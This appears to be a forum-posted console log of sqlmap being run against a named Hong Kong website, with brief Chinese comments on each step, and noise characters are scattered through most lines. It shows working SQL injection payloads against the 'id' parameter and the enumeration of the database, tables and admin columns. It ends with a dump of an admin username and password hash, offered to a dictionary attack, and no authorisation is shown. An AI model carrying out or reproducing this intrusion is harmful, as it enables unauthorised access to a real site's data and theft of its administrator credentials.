D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 [4 ^8 C; M( Y" Zms "Mysql" --current-user /* 注解:获取当前用户名称( o. o" E0 r1 C+ A
sqlmap/0.9 - automatic SQL injection and database takeover tool R5 B/ y9 F; S5 z/ n! v' l6 h* [
http://sqlmap.sourceforge.net starting at: 16:53:54
2 \$ w# O9 o7 Q( f5 w7 O[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" }! o5 h, Z; j* V# W7 ^( h session file0 f/ G; |" n5 u
[16:53:54] [INFO] resuming injection data from session file& z' C$ a; q* ~5 w
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 b, a E( Y* {+ }[16:53:54] [INFO] testing connection to the target url
# T# C g/ D% W" p% ^4 p& \) Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 a" v, e' l, N7 ~( q# v9 ]
sts:5 p# s: q/ D/ T& q, V! A" j
---
& e) t e/ ~' a- pPlace: GET" U0 l: Z' w( m
Parameter: id
5 c+ e! J" z8 i( A0 d# Z$ n& a Type: boolean-based blind8 C% v3 {+ j+ }
Title: AND boolean-based blind - WHERE or HAVING clause4 N/ K F, l( J V g( q. O! i' i
Payload: id=276 AND 799=799
$ F$ {7 ^! v8 o+ N/ V% B* C) k6 } Type: error-based) c' h7 [* Z$ I2 B6 a
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# x) i2 Q3 X' l" }" p
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; T& F6 D9 U& M
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( z; {; {& w0 D4 T/ D: W. D0 h# |- c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, K! j; L" k9 G. { k Type: UNION query
. v- @; A, t+ F% x Title: MySQL UNION query (NULL) - 1 to 10 columns
& K4 d& n$ B) S" \% m: e Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 Z0 {! z* b _
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% p: m2 s" L% W' v# U$ O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% c/ d0 ?1 ~6 R4 Q, E, W2 G Type: AND/OR time-based blind
$ ?% b7 \; F' E# c# D) b9 P Title: MySQL > 5.0.11 AND time-based blind8 c8 G4 {9 q H0 ~* E" @
Payload: id=276 AND SLEEP(5)' M8 u" s& b" q5 O
---
: R% r% \3 w5 c4 ^% W. M[16:53:55] [INFO] the back-end DBMS is MySQL5 H& r/ Y+ j& ] h _
web server operating system: Windows
* w/ f' V7 g, Q+ z; ^" A1 Z" T3 Dweb application technology: Apache 2.2.11, PHP 5.3.04 G0 x* S' v! N
back-end DBMS: MySQL 5.0
$ O8 O$ ]1 ?7 `[16:53:55] [INFO] fetching current user
. |7 l. f& J( ^2 P! ocurrent user: 'root@localhost'
9 A: `6 t7 a, v$ W: t[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
' Y7 z6 X. _7 _' N4 ~tput\www.wepost.com.hk' shutting down at: 16:53:582 g% k# Z5 E( C2 X8 R/ o0 V
( Z3 |" _% _" N* J/ X: Y" |, B8 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# M7 G# {1 ^5 y( {6 wms "Mysql" --current-db /*当前数据库
o1 y- Q- T3 u, p0 ~ sqlmap/0.9 - automatic SQL injection and database takeover tool
1 M* k; r+ L1 ~+ }0 _8 s http://sqlmap.sourceforge.net starting at: 16:54:160 A& z( d2 S; k# e3 y1 J
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 V( |9 ~# [5 q( ~ session file3 Z( i" R0 p; E% n: O: @- y
[16:54:16] [INFO] resuming injection data from session file$ z: g. ?4 o0 p0 M
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
' u, ^2 D) S9 l6 w[16:54:16] [INFO] testing connection to the target url5 I$ c Z9 ?" s3 _% \! x
sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 y4 T+ z9 w7 Z/ e9 @* J
sts:
1 D' z( F1 f+ S---/ e0 P" b8 |$ b# J, \; Q) n
Place: GET
$ ?( [9 o4 ^6 L% |1 H6 `Parameter: id
5 r9 J6 @7 Z+ q; F' w; k* { Type: boolean-based blind
! K; {/ ?: g" k0 ~1 g3 P2 [ Title: AND boolean-based blind - WHERE or HAVING clause
# B. ^" W, y, C+ n* K7 o h Payload: id=276 AND 799=799
9 ]. q. Z) B4 k) w- \' k Type: error-based
) o& @8 k$ X! t" s9 s7 T5 q* ]7 C Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! r- Q; D5 f9 n3 n0 ?5 r# F$ b Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 x& j$ J' P6 W" ^1 L7 I* {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 z! @2 y5 p0 _% I9 n
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 ^0 \" v" f3 q! p5 w/ N$ j
Type: UNION query' ~) P: S! ]/ B- D
Title: MySQL UNION query (NULL) - 1 to 10 columns
: R8 `' w* _& Q) U$ [" a2 M/ y. d Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; d! H$ h: z2 v6 d5 c% d* z
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: ?) d1 D0 a% X" b hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 n- j' g7 c5 l& t Type: AND/OR time-based blind% p, P# m8 n0 c/ ?
Title: MySQL > 5.0.11 AND time-based blind! m* a; C f7 b9 y* }# Z% p. `5 G
Payload: id=276 AND SLEEP(5)/ X6 U R7 T6 T0 {: O' n. h
---, H9 G3 R, r, h
[16:54:17] [INFO] the back-end DBMS is MySQL5 Q. Y: y/ V; n6 C
web server operating system: Windows3 n7 K+ ]. _9 R2 R
web application technology: Apache 2.2.11, PHP 5.3.0
& M4 H. P d$ E8 @( N) j, ~ D3 r7 Fback-end DBMS: MySQL 5.04 ~: @0 d [! O; z* S% z
[16:54:17] [INFO] fetching current database
2 N: @ E3 B9 m; z! d2 pcurrent database: 'wepost'
3 J& Q# o) H( C- f9 l[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou" G P4 `" W2 L# j. R; d: v1 L
tput\www.wepost.com.hk' shutting down at: 16:54:187 f j, K5 T" w* D! X- y; n
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
% r. `0 Q) O2 ^( z( Y. ~- R# Zms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
1 a( h6 @3 s+ c' @' A, p" w sqlmap/0.9 - automatic SQL injection and database takeover tool. W( T9 _+ v$ X
http://sqlmap.sourceforge.net starting at: 16:55:258 x* y5 n% x& s" V- M# Q1 N
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as1 R" O' ?$ r$ z
session file& C) A. h9 |6 O }
[16:55:25] [INFO] resuming injection data from session file$ D# S7 m) @; S* t( ?
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 H- @# B- E) \ Q7 n[16:55:25] [INFO] testing connection to the target url; l9 s( c2 {5 M$ J* P8 O
sqlmap identified the following injection points with a total of 0 HTTP(s) reque- Y: s% a! S* r+ e2 w8 K7 s+ s
sts:
$ C0 @& X% A1 G# y4 l! p" S---6 P0 r3 X/ f! Y7 }
Place: GET) ?5 v0 f1 G, L, p9 l8 _
Parameter: id
+ l- u" O$ l; q) T a/ _. h Type: boolean-based blind
3 T* w; v$ ^- Z; C8 S1 T- | Title: AND boolean-based blind - WHERE or HAVING clause6 U- ?. M5 [+ y3 w6 y3 r
Payload: id=276 AND 799=799
E K1 q; V, {0 h% k" M Type: error-based
. ^# V* X0 f0 ~' C1 z Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
y9 w6 i' d' O, E) H* @ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' {( Z- V2 z- ^" m% P6 \2 }$ `120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, D- `. X+ t1 R1 r: A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
z, ?' ~( ~+ T1 d C' p7 j Type: UNION query
$ o6 z, \8 }: ~3 _0 P- b! o Title: MySQL UNION query (NULL) - 1 to 10 columns
/ g$ \, @( Y0 G8 G4 ` Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( k5 }: z7 m" R+ p" b. ?* n8 U
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* y* p- T: c; o# k; A. k: Z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 M r5 L3 |6 @" U# ]1 _4 G, d
Type: AND/OR time-based blind" A8 c4 P) S4 h/ O. Q9 H, H' G
Title: MySQL > 5.0.11 AND time-based blind) L! t8 N1 z" t4 e& {& s
Payload: id=276 AND SLEEP(5)7 P* g' U* M2 C9 t3 b1 S4 s
---% h" v7 q& B6 C ]( K8 p
[16:55:26] [INFO] the back-end DBMS is MySQL
( m$ I' H* S$ f8 S6 m! l9 I* B2 I5 qweb server operating system: Windows$ r; e) n. p! |6 {/ b% L* F
web application technology: Apache 2.2.11, PHP 5.3.0
6 ~# O0 @) ^3 V7 o5 o$ Uback-end DBMS: MySQL 5.0% L8 z; I; H! h: \0 Z
[16:55:26] [INFO] fetching tables for database 'wepost'
5 j: w; k% s7 J6 O" K[16:55:27] [INFO] the SQL query used returns 6 entries
; k1 j9 Z/ ^% z" s& qDatabase: wepost
: z5 e W3 k' T) G. I[6 tables]
, @% {; v$ x6 c5 y: J' W* D+-------------+9 E& w3 G. `, u2 p: _
| admin |
: r3 Z9 |6 d1 f, F6 C| article |: p7 I/ e7 H$ P$ F/ l2 \1 f
| contributor |
% [) S9 E0 G, W( j- ]( e# m| idea |5 e7 y2 H- h( d$ q2 I4 a
| image |. {! _: Z3 f7 `8 @& A/ y7 @4 r
| issue |' @6 t i! j: b: M8 K6 Y7 `
+-------------+
3 I" e! z* F+ I! i1 v* b+ L; s/ x[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, L: |# _8 D" ^/ qtput\www.wepost.com.hk' shutting down at: 16:55:33
4 T. S& z( i' n* a; h }, Z
, F$ \) ~5 k0 c* V. A% ZD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( ?" n9 q2 t; K( j" e
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名; U6 \. q. D A
sqlmap/0.9 - automatic SQL injection and database takeover tool; a E9 \7 b k* R9 t8 ?
http://sqlmap.sourceforge.net starting at: 16:56:067 A7 s, M$ k1 ?" D& d
sqlmap identified the following injection points with a total of 0 HTTP(s) reque! K w) Z) D n4 [' L8 @1 R
sts:/ n2 ?9 h% u" v' q) a# J, @0 b$ w
---
9 \: c# j T: _: i' e# YPlace: GET8 W" ~4 x% h9 g$ c2 T$ [
Parameter: id1 W& D& x; }( `
Type: boolean-based blind
$ z% J1 X1 i" E; F; n, N Title: AND boolean-based blind - WHERE or HAVING clause
R1 C4 }8 A# a: S" o Payload: id=276 AND 799=799
1 ^6 ~4 P- ]' N Type: error-based
% |2 v7 V! d, w$ N6 [ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- I q$ q. [; Y; F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. N, h, t% v( p2 ^* Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" M6 K3 S1 C: p! e9 o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 D$ |. m* k4 u- K5 e Type: UNION query# e( v3 F& q( k- {1 n# i% s
Title: MySQL UNION query (NULL) - 1 to 10 columns" M# c2 \9 [1 Y, L8 J `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 X- ^2 }0 N! [/ e(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! F4 w. c x' K; V' t
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 M4 |9 F! I8 C* t
Type: AND/OR time-based blind7 v4 x3 N8 P( ~, M: r8 w
Title: MySQL > 5.0.11 AND time-based blind
* s9 B/ x0 t! F3 ]8 Q$ @5 ] Payload: id=276 AND SLEEP(5)* {0 v* n2 h7 ~. K7 T
---9 L6 J5 B+ T, _) U* `: E# d
web server operating system: Windows4 ], V+ Y# S, G- i' w$ s
web application technology: Apache 2.2.11, PHP 5.3.0( f# B; x" p0 `9 ^: H6 P" ?
back-end DBMS: MySQL 5.07 E# V, q3 N9 [
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
) I d. ?" l: i8 c/ g6 @ssion': wepost, wepost
* S( Z6 S) E/ c5 ~* E/ lDatabase: wepost
0 P+ w+ B# E$ k1 H; jTable: admin
: p7 Z) W2 G, s% `" ?5 \( K& y[4 columns]3 N2 K' @2 M) ]1 X7 O2 Z: W7 a" ~
+----------+-------------+
$ Y1 d2 r7 N& Z8 U Z, E| Column | Type |
i2 F8 f# h8 F5 |$ R/ U+----------+-------------+7 k, i, D8 n' `8 |3 g% x
| id | int(11) |
$ [! [1 H% x& a| password | varchar(32) |- f$ [) s$ p g) O- c% B
| type | varchar(10) |2 C6 _, L0 m; l" Y2 B
| userid | varchar(20) |; ?! V3 x0 R$ |% V8 M* o: U
+----------+-------------+* f+ [6 a) o. a4 _
shutting down at: 16:56:19' d( W7 Y: {1 C# R6 E4 [0 I- `% b
- u# c1 v i* W j; a, u0 o3 d
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
9 [4 }2 d# ^4 C& R1 b. ems "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
/ v$ [) m) a- l9 U9 h# Y sqlmap/0.9 - automatic SQL injection and database takeover tool
6 f8 J5 a- g: T5 | l# e* Y http://sqlmap.sourceforge.net starting at: 16:57:142 Y* D' R0 m# L3 _
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 O( p7 j1 V9 R3 k$ [5 ]+ ysts:3 {! \% F/ U* G2 ]0 l+ n$ l! D
---
: i/ |, l, {( v: n0 {3 MPlace: GET
* a: R# H- d; l" n1 eParameter: id8 |+ s! u9 x; |% |$ a. s! Q, T
Type: boolean-based blind
2 u, L+ s3 @; L4 J Title: AND boolean-based blind - WHERE or HAVING clause$ G) y+ [- H5 g {
Payload: id=276 AND 799=799
- z1 X7 O! m/ B/ D" [& Z Type: error-based0 S s5 T0 C+ s$ n
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, l+ M% T' h* e/ m/ X6 N
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 W& M5 S4 R0 Q) D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
( K4 H( k2 p: f, e, w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 D6 L- y9 a+ u2 x7 x+ t
Type: UNION query
% h. D7 l& R# k1 q% Z) {% u9 T Title: MySQL UNION query (NULL) - 1 to 10 columns
9 N4 ~- L" \. T: d1 t Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% x; S5 {9 ~+ v7 I
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. P) P" X, m+ @/ Q8 r' q% }* fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 C, r0 Q( E3 a7 y9 Z# D
Type: AND/OR time-based blind
! J+ _- |. D. d% {# K Title: MySQL > 5.0.11 AND time-based blind
! M- `" F3 P3 R) a/ E3 F Payload: id=276 AND SLEEP(5)# [3 c1 P8 b8 z: P* W* I
---
" ?& s% M8 c g. @; @+ Uweb server operating system: Windows
7 K/ {+ ?) P$ \web application technology: Apache 2.2.11, PHP 5.3.0, U& x) [/ t" H \8 M( a* ?
back-end DBMS: MySQL 5.0
2 p1 q+ x6 D1 ]7 m! O9 r0 l0 vrecognized possible password hash values. do you want to use dictionary attack o
n3 z" _* W# n: Pn retrieved table items? [Y/n/q] y
H5 y, a5 ?: \4 F/ V F1 Dwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]0 W/ s9 p# \2 D4 y( ?# U# l
do you want to use common password suffixes? (slow!) [y/N] y
8 {4 n/ L$ s! @# xDatabase: wepost p B4 y9 V5 k4 N
Table: admin
1 l1 J4 `1 c7 k/ k[1 entry]
2 ~6 t2 a; a+ w1 b+ O- K# S+----------------------------------+------------+" o% f* o" L4 j$ q/ _
| password | userid |
$ |' c9 C% T8 M* D) j4 o+----------------------------------+------------+$ z' d- n8 M- l! Q+ Z+ _ j
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
2 L9 ]. }. @. w8 @+ L' G6 n+----------------------------------+------------+
2 g" Z1 i# y2 `+ i( | shutting down at: 16:58:14' N( v& `! t- }7 l- X: u
2 z, B$ u( Q& F+ F7 {: aD:\Python27\sqlmap> |